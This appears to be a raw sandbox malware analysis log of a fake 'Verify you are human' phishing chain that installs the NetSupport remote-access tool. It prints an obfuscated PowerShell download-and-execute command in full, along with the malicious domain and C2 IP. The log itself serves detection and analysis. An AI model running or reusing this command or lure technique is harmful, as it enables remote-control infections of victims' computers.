                      Source: global trafficDNS traffic detected: DNS query: traversecityspringbreak.com
                      Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                      Source: unknownHTTP traffic detected: POST http://92.255.85.135/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 92.255.85.135Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49718 version: TLS 1.2
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, type: DROPPED
                      Source: Yara matchFile source: 00000014.00000002.2447675169.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\msvcr100.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: classification engineClassification label: mal84.phis.troj.win@31/30@17/158
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmkmmfgx.y2h.ps1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\notepad.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1932,i,1389659103431353991,14239789297215487366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1932,i,1389659103431353991,14239789297215487366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 7940''
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\fzxYFa
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe "C:\Users\user\AppData\Roaming\fzxYFa\client32.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe "C:\Users\user\AppData\Roaming\fzxYFa\client32.exe"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: pcicl32.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: shfolder.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: pcichek.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: pcicapi.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: samcli.dll
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeSection loaded: dbghelp.dll
